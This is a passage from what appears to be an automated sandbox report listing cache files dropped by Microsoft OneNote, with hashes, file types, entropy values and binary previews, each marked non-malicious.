SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3366258873297
Encrypted:	false
SSDEEP:	48:escZe23Tqk/KWtVX8E3yddX6Xe9Vs2pylrdMrXpCzmFXE4nXGO7hAAnOEerWi:esY3TqCKWMEEX6O9V/QRMXvX2E
MD5:	B227D2D3E4049CF4C3CE50975D1FBE60
SHA1:	98B08A130A7235ED86D831A6F8C311631721B6EC
SHA-256:	F7A8ACEC954FF3A24DCCD272AC5C09F5FC074F3D51196A202B38FBDA70ED43B9
SHA-512:	D2012872384D258484ED0380F726E5CD45F3558FD2548F79594F67C64DEC209026FA8DA0A0212C022CCD888B5D7492E2058A47DE9F0F4CA8F234BE4F89AA60FF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.T.......T.C.........H.T.C.........H.T...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'......................X.j.}9.....N...^............... I...tE..m............f........................................I.qk..B.....LZ.....................X.j.}9..................X.j.}9...........T.......T.......T...........................................T.j.....T.T.]...T.......T..B...T.H.....T...B...T...>.).T...J...................;........4...4...4.."...............T...T...T...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........T.......T.....#.T.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.2871873127247575
Encrypted:	false
SSDEEP:	48:xYR6nv9FY8jgy16YEDbPUErl7f/9ePi1PuPhPuPPPBPjPlP:xWQ9FrcuEDb8EZV+6OhO3BbV
MD5:	FEF540E82351323000B3A86441D54C86
SHA1:	913F1B279BC87430BFBEC60564164887AADFE754
SHA-256:	CC147C88F3DC711AFE7655C1594F15D182F19C17AEDA3A7500100F771D8BF13F
SHA-512:	792787D9F5EBD27B24DAEEB1758828D5B2D879C34823B0A1053647DAB3374F92A9CDD2A5F0FEA3735CEE0C56B86ACE460B2C3A3117891D4A20DEC94C2F4F5FE5
Malicious:	false
Preview:	........$...........t......................................?....................................................................................................\.......................................FV......FV..;L.H...2s..AI......AI..@........'D.~....%<P..K;U'D...AI..@.........AI....8.D..WJ~ :F.............'D......'D..................................................FV.T&h..'D...{..'D.X....'D...4..'D......'D...$.....T.9..[..T(T................4..(.....x.(.....j.L.....j.L.`2.....7a..w.......w...;z&.(.....T2...v.......4....................AI.w...'D....................................AI..c..,0...e...B4.$........[.-...I.......9......................w...;z&.(.....Tw...j.L.`2.....7a..j.L....8.D..WJ~ :F........>.......@........AI..@...........8.D..WJ~ :F................'D......'D.~....%<P..K;U...........8.D..WJ~ :......FV......w....c..,0...e...B4.$..............E........................................0...........e....4..................T.o. .D.o. .L.i.s.t........s.)..O@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.880468927587463
Encrypted:	false
SSDEEP:	192:1sMRrGMh9izx9IO90EKo41ucowrxXQTTmlbQRzEjz:qMDg78NHuxRz
MD5:	38C384B3F6F67C812885F0A142DE8802
SHA1:	CDFEBB47A0C101B798B6B8B53F551023B27D4C4D
SHA-256:	858E4E47EFBCAFA506788EFE32A5A3A8B53603235CBDD3A829E9EEC4589ED296
SHA-512:	97CAE88545B58796407E03C9B34147038AAB695B490E2A34349340B0998C4E8E73050F96E9CF06F18BC3AD54A70C128AC7AE77DCA7057BB682BD9D7FD0C19EA5
Malicious:	false
Preview:	2...>...........v........ .. "..2...>...d...<...v.......@....!...........................................................................................................................................I.......I.qk..B.....LZ..o.;.....oO....4.{.$.....oO....4.{.$.....o..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............It}...$...8......N...^.....................OD.....}.3............(...............................D....I.qk..B.....LZ..............It}...$...8.....................................o.......o.......o...........................................oj......oT&~....o.......o..g....oH......o .)....o$......o..u...................;........4...4...4...................o-..o...o..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(..o#..o8..o..z...,4. .......$>........4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.052002156876205
Encrypted:	false
SSDEEP:	192:W9/Fy3Qa/PlK5xALawpiVbK7lFpreXAcaRJKt1PePtgh9MKmQgUWhlNeHL8FiGWa:Uyga/tK8LKoRJE3CUOz7xX80ZVYIZWe
MD5:	4E55F855D615E6A27BB5435E0E747A60
SHA1:	6F2CC92D3B5E1E3F1C2B1D60A244A2D72DF15DFD
SHA-256:	E22994331573E8CBE67C8476CAD446DDB74BD122E743B59C4E92E6C0137E20D7
SHA-512:	6E325917D6FA3E245B4934ED316F86E35F3E07167EA0693FDA16017C9570759902D102734EC1F8330B146ACC68449C5DD7D339E3ED30D1CBA21F0FC526BEEB1B
Malicious:	false
Preview:	....>.......,...D.......x ..`9......>.......\|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ?.......?..A....5U?w;.L..x.Z.....E..{..x..?..A....5U?w;.LF?....I.qk..B.....LZ.I............x.......x.......x...........................................x.j.....x.T.t...x.......x...N...x.H.....x...5...x...F.%.x...................;........4...4...4..............x.:.x.L.x...z...y.. x.. ...........$........2..72..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'.x.%.x.9.x...z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1........x......x.....%.x.#...'.x.&...2.x.....9.x.....:.x.$.....x.........'.x.%.x..x...z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3..................x.:.x...x...z...y.. x.. ...........$........2..72..7.....*

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.803921644718985
Encrypted:	false
SSDEEP:	192:JsKn8jFIAyLRg2p53VBKSVGw9pXCWbQRJh08uywCTKy98UfRBsu3zXcR9Yts0aid:uMJp537JD/nQRJMywsK68UJCezX6jip3
MD5:	DDBBA0E9F257EE69B596B7311C2C7BAB
SHA1:	1AAA9CCCF3AC65C420C15C473AF5B91AFEB2962E
SHA-256:	4722EAEDC2931C1A2D88E033E9329FA3BD0B2F2006E5F4B319CD14BD931A583E
SHA-512:	B8FAF9FF839D03FBD440E909B4856E5F1C1EE863757BAB748D7C3C2AF997FE222FCCCD9A2352204449FC9845B6F9496BEBEA38FFA0CFE6467C30AA9FBC31D109
Malicious:	false
Preview:	2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ..q.P.....q{......L.......q{......L.......q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............U@..j..'..).......N...^.............../.].c..G...:\|...................................................I.qk..B......LZ............U@..j..'..)......................................q.......q.......q...........................................qj......qT......q..o....q.......q..O....q..s....q$.A.$..q$.................;........4...4...4...............q3..qX..q..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9...............q3..qz..q..z...y.. x.. ...........$........2..72.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) H, numeric, rows 1051426662, columns 0
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.296631615393777
Encrypted:	false
SSDEEP:	3:Ptl4t9Cl/RJsl/lJSajlBRtl:PtuCpRJsltPtX
MD5:	AE64F1DF33EDBE657F901BA75FBCEFF3
SHA1:	10DDEBC1417A32FA1F1FB7BD7C5E233B63924D36
SHA-256:	9BDABFD8A0CF3DFAAAFC417C9CC9DDD7B9F94AB751E5BDAFE5524048AE17CF7D
SHA-512:	7A3F7C58CD6DF539CF0A5DA6F48C5798825014FC7FABEF2E9F05799B7080015896D3BF10C16D488C569253D7DE5AABED72E4DE5FAC725BC9487FC43D0F87666D
Malicious:	false
Preview:	....f..>............H....................................0..............

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000001.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.376451495895344
Encrypted:	false
SSDEEP:	384:3ouDrjkbh7xP2FSdnglXefaEHLplgS/nwRvCqoYWS/ZoWU7bnXxCO:3Ob3P2QdngluVDY4OBFUP
MD5:	0507657B9EBDDE1635C94D9FEA6AA614
SHA1:	E01509A85B71AD33EC0C27FC252B401836BE31A0
SHA-256:	981BE92B4698946D182A409A5870835121305D8335B0B846B83C7BC41A1ABDE1
SHA-512:	F746C696CD15FE6C0E7D23EFC0C298B66EC74765DD8F252088524B5DD66C49AF0D2E0BA6C474C9A5CF5CFD237D59AA37A58897417BBF7FED6409311C81DB0D45
Malicious:	false
Preview:	....................0...........0....+..PN...'....?............................................................................................................................. ....)..PN....9.....<..@...@.Op.b..F.$..i.......s.....K.Z.G.A......5'K.........s.....K.Z.G.A..................s.....K.Z.G.A............71..sg...)..p.B..................@.X.....C..p.'......s.....K.Z.G.A......U?.......A......B...l.............K.I.H.]yY.i......B......C.....c.......Le.._..R'WD..X.5'K.....H.hV...[...&{....s.....K.Z.G.A..........ez].}.....r+........................................................................................................................................H...:..@..........4@..B&. . .....#I1.R..I...v;...P.IEF.....C.r..KJO........L..71..sg...)..p.....$.......B......C.....c......s.....K.Z.G.A.................@X......+F..I.Un.w........R.ox..J.%..-...............4@..B&. . ........s.....K.Z.G.A............................4@..B&. . .....X.....C..p.'.......s....@B......@..9.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000002.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.3011799616107935
Encrypted:	false
SSDEEP:	24:x640+MyT+hzbwTDArLLJ/pUDsiAt/4vS2K+MH4i8bl6TBBESMB:xWzbWDA7UDitmS22y6TBBESu
MD5:	3A50638A031C65B5635D9E7A35B39A6E
SHA1:	E82E529A767A3E8332B759490DD9B012D853C49E
SHA-256:	B86C5CBEA0CB4D88115FD819D93074487FA84A283611D6A120CBBE35E22B1B6A
SHA-512:	0CA429B35333FEAB89AFD46F67C53927362202C71C58AA8DB67C554E253852E31BF7320B042FE3358AA6FA78F2920AD301F775A705187F1F8695BC25A51C9C01
Malicious:	false
Preview:	j...>.......................................................................................................................................................................$...j...>...^...........v.....Q.......Q.EThD.....,~.3.......3..U.[..0.d$..,..:..Eb.....r5.K..:..3..U.[..0.d$..,X3.....Q.EThD.....,~...Q..........3.......3..................................................3.......3..U.[..0.d$..,X.:.......:..Eb.....r5.K.2...^.............................Q................................QT.,..3....)..3..X.'..3...."........................................Q......:...c..,0...e...B4.$.........\|..tQ&G...%QE.3...%.:...........................4..(...(..........3....0...e... ..$.....m.....A.`q1.... .}..:..................0............4..e....5..b4............T-Do..-A...Q'.1.....(...(......%.:......5\|.....J.ID".U.O........v..C-.(H.C.0tF .....N...z...........................................................................................................v..C-.(H.C.0tF .............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000003.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.825126942279515
Encrypted:	false
SSDEEP:	192:x2jfs9IrtR4pwdgnzpudnrCAKpQdgzee9J:x2jfsahRBdgn5AKmWL
MD5:	56C7FEB5BE4E413A395A8A065FEABB2F
SHA1:	762D6FA49EE980AA285D5FE5C2F40A5E5F2EF910
SHA-256:	294AB3540D532572BD7E828589EE30D072FEDBC07A97110E886F64DBB45A4DA2
SHA-512:	FB215FFE47011B61034E4D66A2F89E89F9FD59ED79F22CA77CE82EAF38A883956F0A4918302C420B959394E23F3F54DA67B05F7AB0F7502567C28F39DC639499
Malicious:	false
Preview:	....&..............@.......~........................................................?..?....................................................................&...............................\.2M...o.I%\.,.......,.X...A.K%..!/.J.......J..e"5L....}.z...................................................................,....................................................................5.............@.Lo..;..................,.............................................................................0...@...................M..$m(]..............P./.....Pi.....d.].....`.T........................................*.M..$m(]..........R....%.I.%................J.......J.................................................2...........f.....J.N.:...J.N.H..,..aEG............................................4..(...(.....aEG.....aEG.nL.O......g.J.......J..e"5L....}.z..W......W....I..iE.C."...............@.Lo..;...........................aEG..c..,..................&..................................@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000004.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.4133285644600075
Encrypted:	false
SSDEEP:	96:N+AnbrpgMFBDEb01ChAaJkluvxDuWiNAeuDcndin0InSRg:NprpvFhy0ESaqlup5euqdhR
MD5:	8AC8644A40161BC88696C7C0F7067732
SHA1:	852377231923E648C0E12F9D929354D6F8CD71A3
SHA-256:	AB070116A1294D3832E112B57437AA707F6C2B45616FE88557956E33EF6E322C
SHA-512:	5CCCF629D3F8FBE3E5AF7BA305EF92C10E19EE71A24A0629E26D7B57CDF07716C777FCAF82EC980AEB37630081CB3D709F019964C9161285C74E0B2184A3CA0A
Malicious:	false
Preview:	.......@0.......................................?.p......................................................................................................."......."X~.QL.J,>...............Hl6.J....C...:.......:....TM.{=Z...E...........Hl6.J....C...od>.t..A.Y.$..!od>.....f..C..iP...........Hl6.J....C.................................................................................5.............@.Lo..;............................................................................0.......................\...............Acl7.7.K...".`-............b.......j...................:.....".od>.....7F..............=q......=q..)....M]....@7F......7F.\..lD.HD............"......."....................................................v...B...p...x.{a....+d..=k......f..C..iP.......Hl6.J....C.............4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........=q..)....M]....@=q..x.{a....+d..=k..x.{.....f..C..iP....................:.....".od>.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.2723315143697413
Encrypted:	false
SSDEEP:	12:JYqh0rHeu+9WHeuMsPl6tMSMJV7RFLMhf7DIMdNd4XY7BHHeuMtx9Di9b:qFr+O+El6tMSe7zU7DIMdNd4INH+d/
MD5:	E32804B51A9CCB9FB7C53E05101674C7
SHA1:	E33AB84FA238E73B6943813505AFBAD1D5164E1D
SHA-256:	1D1F635981C5EBB258C6E1A1052ECA741FB0B1DE2C59EF42CE106B1D33C79366
SHA-512:	52EC970966954033BBD0DDF56C9C70517B38B5D42DCFBC29DB6B9864D3124292C31B1B299D3E581353725FFF38D329369380DBEEA18D55B0A0C0738D0A66ACF6
Malicious:	false
Preview:	....>...........x....................?...................................................................................................................................................................=.......=...XG.6.....;.2.......2.A."B...: .C.....$a..-Q........2.A."B...: .C..2...=...XG.6.....;.=........2....................................................................5.............@.Lo..;..................2........................................................./.....=@.,.fc...........................eD.U..RC...........h...N.................................................................../.....=@.,.fc...........eD.U..RC.................=.......=...................................................=...C...=.`.1...=...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s....................$a..-Q.....2.......2.A."B...: .C.2.......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.8025442894959007
Encrypted:	false
SSDEEP:	192:osrQz7y4GvpwOoRcFYa6yJDTGTkB5saLt44ZRcIYI7S++InTJ2Fn:Pw7yxqbRPyThZRl
MD5:	A6DCAEB46BB867B3FCA70B5FECD72FA9
SHA1:	6B289B339EFE821CE93F1D359010D2BDD9012B17
SHA-256:	FB5A421D3552ECD41AD67607C34149EC3CDB6ADF9072D40C88A77DDB18F4403C
SHA-512:	A9098E3BB2947231C604B8CD9482BD55A092441577E080DD0D2027F0C0BB93513949B10263A35C2E3138A9C6636ECE244B25AA7E20B45B41145F731F642CF21F
Malicious:	false
Preview:	r...........&...*...p...P....,..................>..@....@...@..................................................................................................?....................................^.......................>....I.qk..B.....LZ.............Yg....E...~.............Yg....E...~............].x..k............K.......K.......K...........................................k.......k.......k...e...k.......k..>0...K...r...K. .,...K...R.......Z4...................4../4..04..............................p...........................C.a.l.i.b.r.i...........K...z... ..$............................M0.Q...........C...?......@?..@?...PA...?...A...A.............".K.#.K...z...,4. ...........$.4..V/.Q............K...K...K...K...z...y.. x.. ...........$... ./.Q./.Q............k...z...;............4...4..?.. ...................................."...a....5...5.....Q..........5.7.K.<.O.=.=.K.9. .@.8.A.C.=.>.:...p.n.g..........A...@..pA..@.....".@0.<?................z..O......MV.-x}.K.......P........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
